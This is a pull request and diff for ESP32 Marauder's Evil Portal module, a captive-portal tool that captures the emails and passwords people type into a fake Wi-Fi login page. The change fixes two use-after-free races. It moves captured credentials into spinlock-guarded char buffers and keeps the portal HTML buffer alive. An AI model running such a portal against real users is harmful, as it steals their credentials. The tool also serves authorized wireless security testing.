### PR TITLE
Fix cross-task UAF on Evil Portal captured credentials + index_html

### DIFF
--- a/esp32_marauder/EvilPortal.cpp
+++ b/esp32_marauder/EvilPortal.cpp
@@ -8,6 +8,10 @@ char apName[MAX_AP_NAME_SIZE] = "PORTAL";
 
 AsyncWebServer server(80);
 
+// Serializes the captured-credential char buffers between the /get web handler
+// (AsyncTCP task) and the main task's main()/accessors.
+static portMUX_TYPE cred_mux = portMUX_INITIALIZER_UNLOCKED;
+
 void EvilPortal::setup() {
   this->runServer = false;
   this->name_received = false;
@@ -29,10 +33,10 @@ void EvilPortal::setup() {
 void EvilPortal::cleanup() {
   this->ap_index = -1;
 
-  #ifdef HAS_PSRAM
-    free(index_html);
-    index_html = nullptr;
-  #endif
+  // Do NOT free index_html here: the web handlers that stream it (send_P/send) may
+  // still be servicing an in-flight AsyncTCP request when cleanup() runs on the main
+  // task -- freeing it mid-stream is a use-after-free. setHtml() reuses (overwrites)
+  // the single PSRAM buffer each activation, so keeping it for the app lifetime is safe.
 }
 
 bool EvilPortal::begin(LinkedList<ssid>* ssids, LinkedList<AccessPoint>* access_points) {
@@ -49,11 +53,19 @@ bool EvilPortal::begin(LinkedList<ssid>* ssids, LinkedList<AccessPoint>* access_
 }
 
 String EvilPortal::get_user_name() {
-  return this->user_name;
+  char tmp[MAX_CRED_SIZE];
+  portENTER_CRITICAL(&cred_mux);
+  strlcpy(tmp, this->user_name, sizeof(tmp));
+  portEXIT_CRITICAL(&cred_mux);
+  return String(tmp);
 }
 
 String EvilPortal::get_password() {
-  return this->password;
+  char tmp[MAX_CRED_SIZE];
+  portENTER_CRITICAL(&cred_mux);
+  strlcpy(tmp, this->password, sizeof(tmp));
+  portEXIT_CRITICAL(&cred_mux);
+  return String(tmp);
 }
 
 void EvilPortal::setupServer() {
@@ -107,18 +119,24 @@ void EvilPortal::setupServer() {
     String inputMessage;
     String inputParam;
 
+    // Copy into the fixed cred buffers under the spinlock so the main task never reads
+    // them mid-write. Runs on the AsyncTCP task.
     if (request->hasParam("email")) {
       inputMessage = request->getParam("email")->value();
       inputParam = "email";
-      this->user_name = inputMessage;
+      portENTER_CRITICAL(&cred_mux);
+      strlcpy(this->user_name, inputMessage.c_str(), MAX_CRED_SIZE);
       this->name_received = true;
+      portEXIT_CRITICAL(&cred_mux);
     }
 
     if (request->hasParam("password")) {
       inputMessage = request->getParam("password")->value();
       inputParam = "password";
-      this->password = inputMessage;
+      portENTER_CRITICAL(&cred_mux);
+      strlcpy(this->password, inputMessage.c_str(), MAX_CRED_SIZE);
       this->password_received = true;
+      portEXIT_CRITICAL(&cred_mux);
     }
     request->send(
       200, "text/html",
@@ -360,18 +378,23 @@ void EvilPortal::main(uint8_t scan_mode) {
 
   this->dnsServer.processNextRequest();
 
+  // Snapshot the cred buffers + clear the flags under the spinlock (short critical
+  // section), then format/print/save OUTSIDE the lock.
+  bool ready = false;
+  char u[MAX_CRED_SIZE], p[MAX_CRED_SIZE];
+  portENTER_CRITICAL(&cred_mux);
   if (this->name_received && this->password_received) {
+    strlcpy(u, this->user_name, sizeof(u));
+    strlcpy(p, this->password, sizeof(p));
     this->name_received = false;
     this->password_received = false;
+    ready = true;
+  }
+  portEXIT_CRITICAL(&cred_mux);
 
-    // Adjust size depending on your max username/password length
-    char line[96];
-
-    // If user_name / password are still Arduino String:
-    snprintf(line, sizeof(line),
-             "u: %s p: %s\n",
-             this->user_name.c_str(),
-             this->password.c_str());
+  if (ready) {
+    char line[2 * MAX_CRED_SIZE + 16];
+    snprintf(line, sizeof(line), "u: %s p: %s\n", u, p);
 
     Serial.print(line);
     buffer_obj.append(line);

--- a/esp32_marauder/EvilPortal.h
+++ b/esp32_marauder/EvilPortal.h
@@ -88,11 +88,15 @@ class EvilPortal {
 
   private:
     bool runServer;
-    bool name_received;
-    bool password_received;
+    // Captured creds are written by the /get web handler (AsyncTCP task) and read by the
+    // main task -> fixed char buffers (not Arduino String) + a spinlock (cred_mux, in the
+    // .cpp) so a concurrent read can never observe a String mid-realloc (cross-task UAF).
+    volatile bool name_received;
+    volatile bool password_received;
 
-    String user_name;
-    String password;
+    static const uint8_t MAX_CRED_SIZE = 64;
+    char user_name[MAX_CRED_SIZE] = {0};
+    char password[MAX_CRED_SIZE] = {0};
 
     bool has_html;
 


### PR DESCRIPTION
Two cross-task use-after-frees in the captive-portal path (AsyncTCP task vs main task):

1. Credentials. The /get handler (AsyncTCP task) reassigns the Arduino String members user_name/password (String::operator= frees the old heap buffer and mallocs a new one), while the main task reads them via get_user_name()/get_password() (String copy) and EvilPortal::main() (.c_str()). A concurrent read can observe a freed buffer or a torn ptr/len pair -> heap over-read / corrupted creds / crash, on live attacker- supplied input. Fixed: user_name/password become fixed char[64] buffers guarded by a portMUX spinlock (cred_mux); the handler strlcpy's under the lock, the accessors and main() snapshot under the lock.

2. index_html. cleanup() free()s the global index_html on the main task while the web handlers (send_P/send) may still be streaming it from the AsyncTCP task -> UAF mid- response. setHtml() already reuses (overwrites) the single PSRAM buffer each activation, so keep it for the app lifetime instead of freeing.